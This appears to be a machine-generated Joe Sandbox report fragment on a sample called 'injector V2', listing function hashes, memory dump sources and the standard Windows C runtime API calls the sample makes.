                                                                                                                            • Opcode ID: de704682eceb4e38c3b5f09b3cb75fcadd36038b260da3f42776c48b5b55cb81
                                                                                                                            • Instruction ID: d76d7660a7a8e0b50ab572c5f483a359158408b4c544443337649b5db093b239
                                                                                                                            • Opcode Fuzzy Hash: de704682eceb4e38c3b5f09b3cb75fcadd36038b260da3f42776c48b5b55cb81
                                                                                                                            • Instruction Fuzzy Hash: D7D16BB5D002489FDB15CFA8D880BEDBBF5EF09311F2849AAE865EB251D730A945CB50
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.1928296748.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.1927416839.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.1929283933.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.1929311997.0000000000B5D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.1929340707.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.1929369279.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AdjustPointer
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1740715915-0
                                                                                                                            • Opcode ID: c3883cfc76eef90477dc86f80c3d5233577d1adf882329254f29412588d35ced
                                                                                                                            • Instruction ID: 011f415e91e5e5b69ac81c9ec62745c7eed27363568d33de7b20805fe90502ee
                                                                                                                            • Opcode Fuzzy Hash: c3883cfc76eef90477dc86f80c3d5233577d1adf882329254f29412588d35ced
                                                                                                                            • Instruction Fuzzy Hash: 3E511372A022029FDB2A8F14E891B7AB7E4FF16312F1444EDED05972A1E731ED49D790
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00B5010E: WideCharToMultiByte.KERNEL32(?,00000000,00B33046,00000000,00000000,00000000,000000FF,?,?,00000000,00B33046,?,00B4C071,?,00000000,?), ref: 00B5016F
                                                                                                                            • GetLastError.KERNEL32 ref: 00B4F572
                                                                                                                            • __dosmaperr.LIBCMT ref: 00B4F579
                                                                                                                            • GetLastError.KERNEL32(?,?,?,?), ref: 00B4F5B3
                                                                                                                            • __dosmaperr.LIBCMT ref: 00B4F5BA
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.1928296748.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.1927416839.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.1929283933.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.1929311997.0000000000B5D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.1929340707.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.1929369279.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1913693674-0
                                                                                                                            • Opcode ID: 0ce96eb5ecaf084e1ed619947cbce0cc5f82e3837bb8527f9f94e519a23b3e7f
                                                                                                                            • Instruction ID: 76521a857f5b0832f7d109ff8ab0f8d3037f6269f7ac3451eb492d8c058b6502
                                                                                                                            • Opcode Fuzzy Hash: 0ce96eb5ecaf084e1ed619947cbce0cc5f82e3837bb8527f9f94e519a23b3e7f
                                                                                                                            • Instruction Fuzzy Hash: 2321A771600617AFDB10AF658C8197BB7E9FF2436471085B9F86997250DB30EF40ABA1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.1928296748.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.1927416839.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.1929283933.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.1929311997.0000000000B5D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.1929340707.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.1929369279.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 9b523ce69885e20e55402e50f1e1b981a05652e91e36661555709c9526c99c54
                                                                                                                            • Instruction ID: be1db36567d3007cda6b4feda3c6a409c000ac073bafaa49c81cf6002918b56e
                                                                                                                            • Opcode Fuzzy Hash: 9b523ce69885e20e55402e50f1e1b981a05652e91e36661555709c9526c99c54
                                                                                                                            • Instruction Fuzzy Hash: D5216A71600217AF9F20AFB5CCA1D7BB7E9EF0136471185B5F86997251DB30EE00ABA1
                                                                                                                            APIs
                                                                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 00B50212
                                                                                                                              • Part of subcall function 00B5010E: WideCharToMultiByte.KERNEL32(?,00000000,00B33046,00000000,00000000,00000000,000000FF,?,?,00000000,00B33046,?,00B4C071,?,00000000,?), ref: 00B5016F
                                                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00B5024A
                                                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00B5026A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.1928296748.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.1927416839.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.1929283933.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.1929311997.0000000000B5D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.1929340707.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.1929369279.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 158306478-0
                                                                                                                            • Opcode ID: 507738891ba6b25e576b98afd431d28e03af80b38d1db0edf54f0c0c9ee410a6
                                                                                                                            • Instruction ID: 12d92b183119b71e6ad47d4cc7f8598abb6e544062f5b1b315ee1bfb4c76b93a
                                                                                                                            • Opcode Fuzzy Hash: 507738891ba6b25e576b98afd431d28e03af80b38d1db0edf54f0c0c9ee410a6
                                                                                                                            • Instruction Fuzzy Hash: 0011E1A2511A167E671137729CCEE6F6EEDDE86396B1004E4FC02A2102EEB1CE059575
                                                                                                                            APIs
                                                                                                                            • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00B53BE2,00000000,00000001,00000000,?,?,00B51971,?,00000000,00000000), ref: 00B54417
                                                                                                                            • GetLastError.KERNEL32(?,00B53BE2,00000000,00000001,00000000,?,?,00B51971,?,00000000,00000000,?,?,?,00B512B7,00000000), ref: 00B54423
                                                                                                                              • Part of subcall function 00B54480: CloseHandle.KERNEL32(FFFFFFFE,00B54433,?,00B53BE2,00000000,00000001,00000000,?,?,00B51971,?,00000000,00000000,?,?), ref: 00B54490
                                                                                                                            • ___initconout.LIBCMT ref: 00B54433
                                                                                                                              • Part of subcall function 00B54455: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00B543F1,00B53BCF,?,?,00B51971,?,00000000,00000000,?), ref: 00B54468
                                                                                                                            • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,00B53BE2,00000000,00000001,00000000,?,?,00B51971,?,00000000,00000000,?), ref: 00B54448
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.1928296748.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.1927416839.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.1929283933.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.1929311997.0000000000B5D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.1929340707.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.1929369279.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2744216297-0
                                                                                                                            • Opcode ID: 150d94e58e15aefaa22339708b0f3c6eb93d6b01ef7d051fb84f918a2386fa85
                                                                                                                            • Instruction ID: 43e1885cc9900822d50aae56e1f10bc73f010811f840e38796b0312f8d1d34ac
                                                                                                                            • Opcode Fuzzy Hash: 150d94e58e15aefaa22339708b0f3c6eb93d6b01ef7d051fb84f918a2386fa85
                                                                                                                            • Instruction Fuzzy Hash: 6AF09836540215BFCF221FD5AC09B993F6AEB087A6F054190FE1896230DF7288A0EB90
                                                                                                                            APIs
                                                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 00B52265
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.1928296748.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.1927416839.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.1929283933.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.1929311997.0000000000B5D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.1929340707.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.1929369279.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ___except_validate_context_record
                                                                                                                            • String ID: csm$csm
                                                                                                                            • API String ID: 3493665558-3733052814
                                                                                                                            • Opcode ID: d5c06981bfc36291de2505b97a9cda873a24bd7453249828bd61b9ba05bc7eb6
                                                                                                                            • Instruction ID: 40a31173d2aec64bc69540581e6911f60949990bdecf3b5e977b2c018a296dfd
                                                                                                                            • Opcode Fuzzy Hash: d5c06981bfc36291de2505b97a9cda873a24bd7453249828bd61b9ba05bc7eb6
                                                                                                                            • Instruction Fuzzy Hash: 2231CF36502205DFCF228F50CC40B6E7BA5FF0A316F1841DAFC584A121C336C9AADB85